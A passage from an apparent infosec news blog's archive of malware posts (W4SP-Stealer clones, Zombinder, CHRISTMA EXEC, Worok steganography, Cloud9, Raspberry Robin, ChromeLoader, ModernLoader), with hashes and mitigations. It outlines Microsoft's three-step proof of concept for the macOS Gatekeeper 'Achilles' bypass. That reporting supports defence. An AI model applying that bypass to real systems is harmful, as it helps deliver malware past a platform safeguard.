It has been Phylum’s mission for some time to monitor the actions of these threat actors in an attempt to finally bring down their infrastructure, due to their persistent, pervasive, and egregious nature.

It was discovered that several copies of W4SP-Stealer started flashing under different names as soon as the repo for W4SP-Stealer was removed. This new stealer is even being distributed through PyPI by threat actors already, which is a sign that it is becoming a real threat.

It has been discovered that W4SP has been hosted in two GitHub repositories under two different aliases, each with its own purpose.

  • Satan Stealer
  • angel-stealer

There is a copy of the original source here, as well as the earlier versions of W4SP, hosted in an account titled aceeontop. 

W4SP Stealer will likely remain part of the scene for quite some time to come, as will their imitations and other variants.

There will be a constant increase in their number of attempts, their persistence, and their sophistication as time passes. However, Phylum ensured that it would mitigate and block supply chain attacks since its platform is capable enough in doing so.

Malware Analysis and Detection Engineering: A Comprehensive Approach to Detect and Analyze Modern Malware

Tags: Information Stealer Malware


Dec 21 2022

VirusTotal INTELLIGENCE CHEAT SHEET

Category: Antivirus,Cheat Sheet,MalwareDISC @ 9:21 am

VirusTotal cheat sheet makes it easy to search for specific results

Opening the Blackbox of VirusTotal, analyzing online phishing scan engines

The Antivirus Hacker’s Handbook

Mastering Malware Analysis

Infosec books | InfoSec tools | InfoSec services

Tags: VirusTotal, VirusTotal INTELLIGENCE CHEAT SHEET


Dec 20 2022

Microsoft shares details for a Gatekeeper Bypass bug in Apple macOS

Category: Bug Bounty,MalwareDISC @ 11:02 am

Microsoft disclosed technical details of a vulnerability in Apple macOS that could be exploited by an attacker to bypass Gatekeeper.

Microsoft has disclosed details of a now-fixed security vulnerability dubbed Achilles (CVE-2022-42821, CVSS score: 5.5) in Apple macOS that could be exploited by threat actors to bypass the Gatekeeper security feature.

The Apple Gatekeeper is designed to protect OS X users by performing a number of checks before allowing an App to run. In fact, you will not be able to execute code that wasn’t signed by an Apple developer, you will not be able to run apps that weren’t downloaded from Apple’s store if the device is not jailbreaked of course.

The flaw was discovered on July 27, 2022, by Jonathan Bar Or from Microsoft, it is a logic issue that was addressed with improved checks.

“On July 27, 2022, Microsoft discovered a vulnerability in macOS that can allow attackers to bypass application execution restrictions imposed by Apple’s Gatekeeper security mechanism, designed to ensure only trusted apps run on Mac devices. We developed a proof-of-concept exploit to demonstrate the vulnerability, which we call “Achilles”.” reads the post published by Microsoft.

Microsoft researchers explained that Gatekeeper bypasses can be used by threat actors to install malware on macOS systems.

The experts pointed out that Apple’s Lockdown Mode introduced in July does not prevent the exploitation of the Achilles bug.

The Achilles vulnerability relies on the Access Control Lists (ACLs) permission model to add extremely restrictive permissions to a downloaded file (i.e., “everyone deny write, writeattr, writeextattr, writesecurity, chown”), to block the Safari browser from setting the quarantine extended attribute.

Below is the POC developed by Microsoft:

  1. Create a fake directory structure with an arbitrary icon and payload.
  2. Create an AppleDouble file with the com.apple.acl.text extended attribute key and a value that represents a restrictive ACL (we chose the equivalent of “everyone deny write,writeattr,writeextattr,writesecurity,chown”). Perform the correct AppleDouble patching if using ditto to generate the AppleDouble file.
  3. Create an archive with the application alongside its AppleDouble file and host it on a web server.
Gatekeeper bypass.png

while video POC is available here.

Tags: Gatekeeper Bypass bug


Dec 12 2022

95.6% of New Malware in 2022 Targeted Windows

Category: Malware,Windows SecurityDISC @ 11:06 am

Malware attacks are a growing problem in our increasingly digital world. By infiltrating computers and networks, malicious software can cause serious harm to those affected by it.

One of the most common types of malware is ransomware (encryption-based malware), which prevents users from accessing their files until they pay a hefty fee to the cyber attacker. This type of attack has been used to target everything from individuals to large organizations, including government agencies and healthcare providers.

In addition to financial losses, malware attacks can have devastating effects on businesses and individuals. In some cases, sensitive data can be stolen or destroyed as part of an attack. This can lead to identity theft and other forms of fraud, as well as put organizations at risk for long-term damage if confidential information is exposed or compromised.

Research Findings

A recent study by Atlas VPN shows how malware infection is on the rise and the trends in the new malware samples found in the first three quarters of 2022. 

According to researchers, 59.58 million samples of new Windows malware were found in the first three quarters of 2022 and these make up 95.6% of all new malware discovered during that time period. 

This analysis was based on data by AV-TEST GmbH, an independent organization that evaluates and rates antivirus and supplies services in IT Security and Antivirus Research. The study also includes new malware samples detected in the four quarters of 2021 and the first three quarters of 2022. 

Windows, Linux, and Android Malware

Overall, there is a downward trend in the data with the malware samples this year has decreased by 34% as compared to the same period last year. However, the numbers are still exceptionally high.

Following Windows on the list is Linux malware with 1.76 million new malware samples – 2.8% of the total malware threats in 2022. 

Android malware takes third place with the first three quarters of 2022 seeing 938,379 new Android malware threats, constituting 1.5% of the total new malware. 

Lastly, 8,329 samples of never before seen malware threats aimed at macOS were observed in the same period. 

Total Number of Malware

The study also shows that the total number of malware threats found in the first three quarters of 2022 across all operating systems amount to 62.29 million. This is about 228,164 malware threats daily. 

If we make a quarter-by-quarter comparison, the first quarter of 2022 saw the most significant number of malware samples – 22.35 million. However, this number dropped by 4% to 21.49 million in the second quarter of this year. Again, it decreased by another 14% to 18.45 million. 

The numbers continue to plummet into the fourth quarter of the year with 7.62 million new threats found in October and November – nearly 60% less than at the same time last year. 

Protection Against Malware

Malware is a pervasive threat to internet users on both personal and professional networks. It can cause serious damage to computers, networks, and data that can be expensive to fix. Fortunately, there are steps you can take to protect yourself from malware.

The most important step in protecting your network from malware is keeping your anti-malware software up to date. Regularly updating anti-malware programs ensures that they’re able to detect the latest threats and keep them away from your computer or network.

Additionally, be sure not to click on suspicious links or download files from unknown sources as these could contain malicious code that could harm your system.

Another way to stay safe online is by using a secure web browser with built-in security features like pop-up blockers, phishing protection, and ad blockers ((don’t use it on Hackread.com though :0)) for enhanced protection against malicious activities.

95.6% of New Malware in 2022 Targeted Windows

Learning Malware Analysis: Explore the concepts, tools, and techniques to analyze and investigate Windows malware

Tags: Malware, Malware Analysis


Dec 09 2022

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

Category: Hacking,MalwareDISC @ 1:44 pm

ThreatFabric’s security researchers have reported a new dark web platform through which cybercriminals can easily add malware to legitimate Android applications.

Dubbed Zombinder, this platform was detected while investigating a campaign in which scammers were distributing multiple kinds of Windows and Android malware, including Android banking malware like Ermac, Laplas “clipper,” Erbium, and the Aurora stealer, etc.

This comes just days after a new dark web marketplace called InTheBox surfaced online, serving smartphone malware developers and operators.

Further probe helped researchers trace the adversary to a third-party dark web service provider called Zombinder. It was identified as an app programming interface binding service launched in March 2022.

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

According to ThreatFabric’s blog post, numerous different threat actors are using this service and advertising it on hacker forums. On one such forum, the service was promoted as a universal binder that binds malware with almost any legitimate app.

The campaign is designed to appear as it helps users access internet points by imitating the WiFi authorization portal. In reality, it pushes several different malware strains.

What does Zombinder Do?

In the campaign detected by ThreatFabric’s researchers, the service is distributing the Xenomorph banking malware disguised as the VidMate app. It is distributed via modified apps advertised/downloaded from a malicious website mimicking the application’s original website. The victim is lured to visit this site via malicious ads.

The Zombinder-infected app works just as it is marketed while the malicious activity carries on in the background and the victim stays unaware of the malware infection.

Zombinder on Dark Web Lets Hackers Add Malware to Legit Apps

At the moment, Zombinder is focusing entirely on Android apps but the service operators are offering Windows apps binding services. Those who downloaded the infected Windows app were delivered the Erbium stealer as well. It is an infamous Windows malware distributed to steal stored passwords, cookies, credit card details, and cryptocurrency wallet data.

It is worth noting that two downloaded buttons on the malicious website’s landing page, one for Windows and the other for Android. when a user clicks on the Download for Windows button, they are delivered malware designed for Microsoft operating system, including Aurora, Erbium, and Laplas clipper. Conversely, the Download for Android button distributes the Ermac malware.

How to Stay Protected?

If you want to stay safe, do not sideload apps even if you are desperate to make a specific product work. Also, avoid installing apps from unauthentic or unknown sources onto your Android mobile phone and rely on legitimate sources such as Google Play Store, Amazon Appstore, or Samsung Galaxy Store. Always check the app’s rating, and reviews, and check out the app developers’ website before installing a new app.

Cyber Deep Web

Tags: Cyber Deep Web, dark net, dark web, Zombinder


Dec 01 2022

The CHRISTMA EXEC network worm – 35 years and counting!

Category: MalwareDISC @ 11:32 am

Forget Sergeant Pepper and his Lonely Hearts Club Band, who taught the band to play a mere 20 years ago today.

December 2022 sees the 35th anniversary of the first major self-spreading computer virus â€“ the infamous CHRISTMA EXEC worm that temporarily crushed the major mainframe networks of the day



 not by any deliberately coded side-effects such as file scrambling or data deletion, but simply by leeching too much network bandwidth for its own unauthorised purpose.

As a decoy to disguise the fact that it read in the 1980s IBM equivalents of your email address book (NAMES) and your known-hosts file (NETLOG) in order to find as many new recipients of the malware as possible to send itself to, the malware displayed this:

                *               
                *               
               ***              
              *****             
             *******            
            *********           
          *************                A
             *******            
           ***********                VERY
         ***************        
       *******************           HAPPY
           ***********          
         ***************            CHRISTMAS
       *******************      
     ***********************         AND MY
         ***************        
       *******************         BEST WISHES
     ***********************    
   ***************************     FOR THE NEXT
             ******             
             ******                    YEAR
             ******

If you’re wondering why the virus is widely known as CHRISTMA EXEC, rather than by the full word CHRISTMAS



that’s because filenames were limited to eight characters, which could be followed by a space and what we would today call an “extension” of EXEC in order to turn them into scripts that could be run directly by the user – executed, in technical jargon.

The virus itself was written in IBM’s powerful text-based scripting language REXX (the resoundingly named Restructured Extended Executor), so a non-programmer looking at the message would probably recognise it as “program code”, and therefore tend to ignore it as unimportant and irrelevant, for all that it might look interesting.

Except that the author of the virus found a cheerful way to embed an instructional lure right into the code itself, which starts with a remark (as in the C language, text between /* and */ in REXX programs is treated as a comment and ignored when the file gets used)


/*********************/
/*    LET THIS EXEC  */
/*                   */
/*        RUN        */
/*                   */
/*        AND        */
/*                   */
/*       ENJOY       */
/*                   */
/*     YOURSELF!     */
/*********************/


and then offers the following cheery advice to non-techies:

/*  browsing this file is no fun at all
       just type CHRISTMAS from cms     */

CMS is short for Conversational Monitor System, a command prompt environment on top of IBM’s venerable VM/370 operating system and its many variants, which offered individual users a real-time virtual machine that behaved like a computer all of their own, with its own disk space for storing personal files and programs.

Handily, the user didn’t have to be taught to leave the final -S off the word CHRISTMAS, because CMS would automatically ignore any extra characters and hunt for CHRISTMA EXEC, which was the very script program that the user had just received without expecting it or asking for it.

As stated above, the code did indeed display the Christmas Tree ASCII art – or, more precisely, EBCDIC art, given that IBM famously had its own character encoding system known as Extended Binary Coded Decimal Interchange Code (pronounced ebb-si-dick).

But it also trawled through your NAMES and NETLOG files, which listed other users and computers you regularly contacted, and copied itself to all of them, so that for every user who innocently typed CHRISTMAS at the command prompt



a sea of copies of the virus (20? 50? 200?) would be distributed, potentially worldwide, and if any of those recipients (20? 50? 200?) innocently typed CHRISTMAS at the command prompt



a sea of copies of the virus would be distributed, and so on, and so on.

Shades of the future

As we said in this week’s podcast, where we discussed this seminal worm:

[This is j]ust like modern macro malware that says to the user, “Hey, macros are disabled, but for your ‘extra safety’ you need to turn them back on
 why not click the button? It’s much easier that way.”

35 years ago, malware writers had already figured out that if you ask users nicely to do something that is not at all in their interest, some of them, possibly many of them, will do it.

Detection of Network Worm to Eliminate Security Threats in MANET: Wormhole Attack and its Challenges

Tags: CHRISTMA EXEC network worm


Nov 21 2022

Chinese Hackers Using 42,000 Phishing Domains To Drop Malware On Victims Systems

Category: Hacking,Malware,PhishingDISC @ 11:13 am

An extensive phishing campaign targeting businesses in numerous upright markets, including retail, was discovered by Cyjax recently in which the attackers exploited the reputation…

China’s Playbook – new Art of War

War Without Rules: China's Playbook for Global Domination

Tags: Art of war, China's Playbook, Chinese hackers


Nov 16 2022

Massive Black Hat Malware Infect 2500 Websites By Injecting Malicious JavaScript

Category: MalwareDISC @ 10:17 am

Recently, the cybersecurity researchers of Sucuri have found that threat actors are conducting a tremendous massive black hat search engine optimization (SEO) campaign. 

However, nearly 15,000 websites redirected visitors to participate in fake Q&A discussion forums in this campaign. Over the course of September and October, the SiteCheck scanner of Sucuri detected over 2,500 redirects to other sites.

Not only this, but the experts have also stated that each and every compromised site contains nearly 20,000 files. All these files were being used as a part of the malicious campaign, which was being carried out by the threat actors, and most of the sites were WordPress.

Malicious ois[.]is Redirects

According to the securi report, After detecting the malware, the experts conducted a brief survey and found that some of the website’s malware infections generally limit themselves to a smaller number of files.

Not only this, but they also limit their footprint so that they can avoid detection and carry out their operations properly. 

A website infected with this malware will, on average, have over 100 files infected; that’s why this malware is completely different from others.

Common Infected Files

This malware is most commonly found infecting core files of WordPress, and it has also been found to infect “.php” files that were created by unrelated malware campaigns.

The following is a list of the top 10 most commonly infected files:-

  • ./wp-signup.php
  • ./wp-cron.php
  • ./wp-links-opml.php
  • ./wp-settings.php
  • ./wp-comments-post.php
  • ./wp-mail.php
  • ./xmlrpc.php
  • ./wp-activate.php
  • ./wp-trackback.php
  • ./wp-blog-header.php

Domains Targeted

Tags: Malicious JavaScript


Nov 15 2022

Hackers Hiding Malware Behind The PNG Images Using Steganography

Category: Hacking,MalwareDISC @ 10:03 am

The Worok threat infects victims’ computers with information-stealing malware by concealing malware within PNG images with the help of the Steganography technique, which makes it very difficult to detect by malware scanners.

The finding has substantiated one of the most crucial links in the chain of infection of the threat actor as claimed by the experts at Avast. These malicious PNG images are used by threat actors to conceal a payload that facilitates information theft under the guise of being an image.

In the past couple of months, ESET has been revealing details of attacks that Worok has been launching against several high-profile companies and local government agencies in the following regions:-

  • Middle East
  • Southeast Asia
  • South Africa

There are tactical overlaps between Worok and a Chinese threat actor known as TA428 that is believed to be sharing similar tactics.

Compromise Chain

Steganography is a technique that hides scripts within PNG images, such as the compromise series of Worok, which utilizes a C++-based loader which is known as “CLRLoad.”

As of right now, we do not know what vector was used in the initial attack. As part of certain intrusions, the malware was also deployed on Microsoft Exchange Server by exploiting the ProxyShell vulnerability.

A custom malicious kit was then deployed by the attackers using publicly available exploit tools that were available for free. Therefore, the final compromise chain can be summarized as follows:- 

First, CLRLoader is implemented, where simple code is implemented to load the PNGLoader, which is the second stage in the process.

In order to decode the malicious code possessed within the image, the PNGLoad comes in two different variants. While doing so, they launch either the following payloads:-

  • PowerShell script 
  • .NET C#-based

It has been difficult for PowerShell to find the script and they have recently discovered a new malware called DropboxControl, which is spyware that steals information from the system. Provide the threat actor with the ability to upload, download, and run commands contained in specific files.

Malware in PNG Files

When a viewer of an image is opened to view the steganographic code within it, it appears as if the image file is normal.

An image was encoded in a way that allows malicious code to be embedded in the least significant bits of each pixel in the image using a technique known as â€œleast significant bit” (LSB) encoding.

No matter how the third-stage implant is deployed, it is clear that Worok has intelligence-gathering objectives that go beyond simply harvesting files of interest.

Worok attacks have been prompted by tools that are not circulating in the wild. Therefore, it’s likely that these tools are used by the group themselves exclusively to conduct attacks.

Indicators of Compromise

PNG file with steganographically embedded C# payload

29A195C5FF1759C010F697DC8F8876541651A77A7B5867F4E160FD8620415977
9E1C5FF23CD1B192235F79990D54E6F72ADBFE29D20797BA7A44A12C72D33B86
AF2907FC02028AC84B1AF8E65367502B5D9AF665AE32405C3311E5597C9C2774

DropBoxControl

1413090EAA0C2DAFA33C291EEB973A83DEB5CBD07D466AFAF5A7AD943197D726

Codes, Ciphers, Steganography & Secret Messages

Tags: Steganography


Nov 14 2022

Researchers Sound Alarm on Dangerous BatLoader Malware Dropper

Category: Information Security,MalwareDISC @ 11:36 pm

BatLoader has spread rapidly to roost in systems globally, tailoring payloads to its victims.

Little Red Flying Fox Bat (Pteropus scapulatus) in flight during the day

BatLoader has spread rapidly to roost in systems globally, tailoring payloads to its victims.

https://www.darkreading.com/attacks-breaches/researchers-alarm-batloader-malware-dropper

Tags: Malware


Nov 10 2022

Malicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code

Category: Malware,Web SecurityDISC @ 11:38 am

Researchers at Zimperium zLabs recently identified a new Chrome browser botnet called ‘Cloud9’ that is intent on stealing the following information using malicious extensions:-

  • Online accounts credentials
  • Log keystrokes
  • Inject ads
  • Inject malicious JS code
  • Enroll the victim’s browser in DDoS attacks

This method is becoming increasingly attractive for malware developers to target web browsers as they contain the most valuable information about a user.

In the course of everyday activities, we can find out a lot about ourselves through our keystrokes or session cookies. A breach of security or a violation of privacy can be caused by having access to such information.

Cloud9 botnet is a RAT that affects all Chromium-based web browsers, which are popular among consumers like Chrome and Microsoft Edge. Moreover, threat actors could exploit this RAT to remotely execute arbitrary commands.

Technical Analysis

The official Chrome web store doesn’t host this malicious Chrome extension, so it cannot be downloaded from there. 

The distribution channel of this malware relies on communities that are operated by threat actors, wherein the malware will be hidden by users of the tool before it gets delivered to the victims by the tool itself.

In terms of the Javascript files that make up the extension, there are only three. While the primary functionality of the extension can be located in a file called “campaign.js” which contains most of its functionality.

According to the report, During the initialization of campaign.js, the window.navigator API is used to identify the system’s operating system. Once the target has been identified, a Javascript file is injected into the victim’s computer system as a method to mine cryptocurrency using the resources of the victim’s computer system.

Next, for further proceedings, it injects another script known as cthulhu.js which comprises a full-chain exploit for the following flaws:-

  • CVE-2019-11708 (Firefox)
  • CVE-2019-9810 (Firefox)
  • CVE-2014-6332 (Internet Explorer)
  • CVE-2016-0189 (Internet Explorer)
  • CVE-2016-7200 (Edge)

As soon as the vulnerabilities are exploited, Windows malware is automatically installed on the host machine and executed. This gives attackers even more opportunities to compromise systems and carry out even more severe malware attacks.

While one of the sophisticated inclusion of this malware is “Clipper,” a module that keeps scanning the clipboard of the system for copied data like:-

  • Passwords
  • Credit cards details

In addition to injecting ads into webpages silently, Cloud9 is also capable of generating revenue for its operators by generating ad impressions.

Cloud9 Botnet Functionalities

<strong>Malicious Chrome Plugin Let Remote Attacker Steal keystroke and Inject Malicious Code</strong>

Tags: Malicious Chrome Plugin


Oct 31 2022

Active Raspberry Robin Worm Launch a ‘Hands-on-Keyboard’ Attacks To Hack Entire Networks

Category: MalwareDISC @ 12:47 pm

During recent research, Microsoft has discovered evidence of a complex interconnected malware ecosystem that is associated with the Raspberry Robin worm.

With other malware families, there are several root links to the Raspberry Robin worm were identified. Even security experts have detected that it uses alternate infection tactics as well.

Infections like these lead to a variety of complications and here below we have listed them:- 

  • Hands-on-keyboard attacks: When attackers are already inside your environment following a breach, a hands-on keyboard attack will occur. It is a two-sided operation; on one end it’s the cybercriminal who sits at a keyboard, while on the other side it’s your compromised network that is being accessed.
  • Human-operated ransomware activity: It occurs when cybercriminals are involved in an active attack on a victim. Using this approach, an organization’s on-premises infrastructure is penetrated, privileges are elevated, and ransomware is deployed by the threat actors.

Compromised 1,000 Organizations

In the past 30 days, on more than 1000 organizations’ 3000 devices, the Raspberry Robin worm has initiated payload alerts. There have been instances where the Raspberry Robin worm has been installed on the victims’ systems with malware called FakeUpdates.

Raspberry Worm is also known as QNAP Worm, as for command-and-control, it uses the compromised QNAP storage servers. Through infected USB drives containing malicious. LNK files, Raspberry Robin spreads to other devices.

The worm will spawn a msiexec process using cmd[.]exe as soon as a USB device is attached.

In order to communicate with its C2 servers, the malware communicates with compromised Windows devices.

Raspberry Robin’s Connection

Microsoft Security Threat Intelligence Center (MSTIC) observed Raspberry Robin in October 2022, and it’s being used by DEV-0950, which is another actor who was also involved in the post-compromise activity.

As a result of the DEV-0950 activity, the Cobalt Strike was compromised through hands-on keyboard activity. The majority of the victims of DEV-0950 are traditionally acquired via phishing scams.

However, the operators of DEV-0950 have moved to use Raspberry Robin instead of the traditional method. The advantage of this approach is that the payloads can be delivered to existing infections and the campaigns can move to the stage of ransomware more quickly.

Mitigations

To mitigate the impact of this threat, it is also possible for defenders to apply the following mitigation measures:-

  • When mounting the drive, prevent autorun from being used and code from being executed.
  • Make sure the tamper protection setting is enabled in order to protect Microsoft Defender Antivirus from being interrupted by attacks.
  • It is very important to turn on cloud-delivered protection for Microsoft Defender Antivirus or your antivirus software counterpart if it supports the feature.
  • The USB port should be blocked from running untrusted or unsigned processes.
  • Scripts that may be obfuscated should be blocked from being executed.
  • It is imperative to block executable files from running unless they fulfill all the trusted criteria.
  • The local security authority subsystem of Windows should be protected against credential theft.

Tags: Active Raspberry Robin Worm, Malware


Sep 26 2022

Chromeloader Malware Drops Malicious Browser Extensions to Track User’s Online Activity

Category: MalwareDISC @ 12:11 pm

An ongoing, widespread Chromeloader malware campaign has been warned by Microsoft and VMware. It has been identified that this malicious campaign is dropping node-WebKit malware and ransomware, as well as dangerous browser extensions.

ChromeLoader was observed in the wild for the first time in January 2022 for Windows users and in March 2022 for Mac users by the VMware Carbon Black Managed Detection and Response (MDR) team.

The ChromeLoader is one of the most widespread and persistent malware programs on the web. A surge in Chromeloader infections occurred in Q1 2022, with the cybersecurity researchers from Red Canary theorizing the malware was used by affiliate marketers and advertisers to defraud them of their money.

To perform click fraud and earn money for the threat actors, the malware infects Chrome with a malicious extension in order to redirect user traffic to advertising websites.

Technical Analysis

The malicious campaign that caused this problem was traced back to a threat actor tracked as DEV-0796 that infected victims with several different types of malware by using Chromeloader.

In addition to ChromeLoader, there are several variants of the program such as ChromeBack and Choziosi Loader which are known.

The malware called ChromeLoader is delivered in the form of ISO files that may be downloaded from any of the following sources:-

  • Malicious ads
  • Browser redirects
  • YouTube video comments

After Microsoft began blocking Office macros by default, ISO files have become one of the most popular methods of distributing malware.

Additionally, Windows 10 and later automatically mount ISO files as CDROMs when double-clicking them. By doing so, they provide an efficient method for disseminating multiple malware files simultaneously.

There are four files that are commonly included in ChromeLoader ISOs:-

  • A ZIP archive containing the malware
  • An ICON file
  • A batch file (commonly named Resources.bat) 

A batch file is then created, which launches a batch program, and is installed along with the malware.

Chromeloader Malware Drops Malicious Browser Extensions to Track User’s Online Activity

Tags: Chromeloader


Aug 30 2022

Three campaigns delivering multiple malware, including ModernLoader and XMRig miner

Category: MalwareDISC @ 8:27 am

Researchers spotted three campaigns delivering multiple malware, including ModernLoader, RedLine Stealer, and cryptocurrency miners

Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims.

ModernLoader is a .NET remote access trojan that supports multiple features, including the capability of gathering system information, executing arbitrary commands, or downloading and running a file from the C2 server.

ModernLoader

Threat actors use PowerShell, .NET assemblies, and HTA and VBS files to perform lateral movements across a targeted network and eventually drop other pieces of malware, such as the SystemBC trojan and DCRAT. The attackers’ use of a variety of off-the-shelf tools makes it difficult to attribute this activity to a specific adversary.

The attack chain starts with an HTML Application (HTA) file that runs a PowerShell script hosted on the C2 server which executes the next stage of the loading process.

“The next stage is the PowerShell loader. The loader contains embedded code of three modules, which are loaded using reflection as additional .NET assemblies into the PowerShell process space. The downloaded PowerShell code also downloads and runs auxiliary modules and payloads.” reads the analysis published by Cisco Talos. “There are usually three modules in this loader format. The first disables AMSI scanning functionality, the second is the final payload, and the last injects the payload into the process space of a newly created process, usually RegSvcs.exe.”

The final payload appears to be a ModernLoader remote access trojan (RAT) and the XMRig miner. Talos reported that the March campaigns targeted users in Eastern Europe, including Bulgaria, Poland, Hungary, and Russia.

The threat actors behind the campaigns are likely Russian-speaking actors, that are experimenting with different technologies. Experts speculate that the usage of ready-made tools demonstrates that despite the actors understanding the TTPs required for a successful malware campaign, they haven’t the technical skills to develop their own arsenal.

Cisco Talos attributed the infections to a previously undocumented but Russian-speaking threat actor, citing the use of off-the-shelf tools. Potential targets included Eastern European users in Bulgaria, Poland, Hungary, and Russia.

The attackers also compromised vulnerable web applications to change their configuration to use malicious PHP scripts to deliver malware to their users.

The attackers attempted to compromise WordPress and CPanel installs to distribute the malware using files masquerades as fake Amazon gift cards.

“The actor is frequently using open-source components and code generators to achieve its goals. A number of remote access tools, stealers and cryptominers are used in the campaigns to eventually reap financial benefits for the actor. The actor has an interest in alternative distribution channels such as compromised web applications, archive infections and spreading by using Discord webhooks.” concludes the report. “Despite all the techniques and tactics used we estimate that the success of these campaigns is limited.”

Malware Analysis

Tags: ModernLoader, XMRig miner


« Previous PageNext Page »